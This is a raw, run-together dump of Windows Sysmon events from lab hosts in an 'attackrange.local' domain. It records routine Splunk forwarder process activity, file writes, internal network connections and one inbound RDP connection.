07:45:53.380{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.380{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.380{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F331-60EB-FC7C-00000000CF01}7976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.381{466BC892-F331-60EB-FC7C-00000000CF01}7976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001046603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:45.680{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50932-false10.0.1.12-8000- 354300x8000000000000000806387Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:51.388{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57177-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806389Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:54.457{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA6D90BBA13B93DD44646E81534558DA,SHA256=7E33C6185A8C769D2F489CCB2D143904E3C6E9B47BA243A2E887ECAABEE95D72,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:54.079{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F332-60EB-FD7C-00000000CF01}9572C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:54.079{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F332-60EB-FD7C-00000000CF01}9572C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001046620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:54.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:54.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:54.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:54.079{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:54.079{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F332-60EB-FD7C-00000000CF01}9572C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001046615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:54.064{466BC892-F332-60EB-FD7C-00000000CF01}9572C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:53.995{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D75408A11D6C01ECD6AB53B9FAF3372,SHA256=ED3A8F79983EAB255FF9D534A09A71CEC59C3AF0ED5BA373C8114521C44B0474,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806390Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:55.457{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EDA778800BEBD16FBE8852D15D94D1E,SHA256=8F61B7A8870599ABC46186BFD8791131174BB19166A664257A6F838E790C5A1B,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001046624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:55.078{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A1000C0329D314D3C8B8C83CB2484B1,SHA256=496FDFC9C02DDD7A5B2F15A352AE8E4E323D82288917B75920724D2C33075EBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:55.009{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4C0C3BD956ED2A9CA7FB58E70EB68195,SHA256=825F40F095171C783CDC39221215C280CB352B4F04B692657D54CDBBFC933B11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806391Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:56.472{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F264AF1DE2C6FDBAF8515150C95DFD70,SHA256=E5D53B2035CE818DB16FA0C8B8F023BFCFFECF3A28F9A5BF9FAF3430BA52F262,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:56.793{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001046625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:56.077{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B336FFDF9BEEA19BE5D60D263E213242,SHA256=58FAE8E6B46FF78C3E96AEF83D31FB38A58D0ED151732706355394A16CDE9391,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806392Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:57.488{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77DB1050FC6A9B151467482607ED8DFC,SHA256=C37B3318CB60CF98FF64E9A247D75D6367639E294740512EFFB61946E1655DEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=D08BF5BB5F7335E3200E83EF2ADE792F,SHA256=DED845FEBD2997A642FACCDBB9D36FDA5A381F6C3FF94039609DFA1B96045BFA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=4E9B529A37BAC5BCB56818457EF14B54,SHA256=5FD4E2FABF3C59B2DA1E2669C765D73027F09417FB1228CED69A0FE80E3EE02A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F945381C2FB157A3FA8CF2411BFC2C47,SHA256=898A8B21D644FE0BB9E3D491A6A1D03AF5B013029AC3402ADF0921494C4789A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DE6C0F0092AC2C5E5F5DF585B1C1F233,SHA256=B4F36F2FFC56F5DBE21B222A5F60A8B58BB614527A7B1C38391DDC9A3606949A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=787D999BB7CE86B4636B02329960392F,SHA256=FE1E617447BE2C7E27FB553BD5AA6B9C2F9D310C2984E4956818A675EA485B75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CD2214D562DEC8F9C005B26E97875F6A,SHA256=AEF2F440A274009C71EE22BE97FBB5456885D9D00F8B03CF1D268A7752204624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9ABAE90EFF1967C18ED7E310D711EE07,SHA256=E48FC511507FE93478838BF95D37A4ACDF3DDFEB22D829F9A92F434D14113BF4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1457D11788E5E9FC5E01A87BB2FFF1DB,SHA256=A9DE5F9DAA538088A8F89EE76B2F78B69DFA2BE570222918959F87EE538AA2EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=978C31FB712D76624D8912657CF00D13,SHA256=B223A2A097333FE954E8362EDD3C2F94AE300A19E9739A0E2269B8BBA20D7D9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla 
Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C67C6BA37DA7E2D12753CB4A77723425,SHA256=D318E8DFC5D9166ABE6A9F2C526010B5AC472121A42653B6C1B91B126F0A73BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.645{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E6697A2651489C9534066B544B49FC04,SHA256=B6FDD947FC21829475F9F636CC6C590C213B9DD0FCD849B2EB96FDD7B4CF6F40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:57.108{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD6AE77E695E3DC66943038EFF273B4E,SHA256=B0328EE64E13A20E665D32CC0A0D19399EB63384F13DFCFF3996E96949EDEEC9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806394Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:58.489{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5E72418D94B4090CE1AF15C4B61D11B9,SHA256=697CF75903E31098FC8C1D601201FD1C1EE194F1355744D3F520174D8A69C1A4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:50.331{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50933-false10.0.1.12-8089- 23542300x80000000000000001046639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:58.108{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B672C6BE12C7825F034BE305D3761842,SHA256=90BEE45AC21800C3EF3F0559B0F5B75F82D04FC272F5C9EB1E5EAB8C1B099C79,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806393Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:57.293{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57178-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806398Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:59.504{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6B27341BC61502197582D95ECDBF6EF,SHA256=16E9DD6DBCABC09E1D242276BBA9176E6A31F728F6D20F637ABF6EA167C445BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806397Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:57.752{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-25924-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 
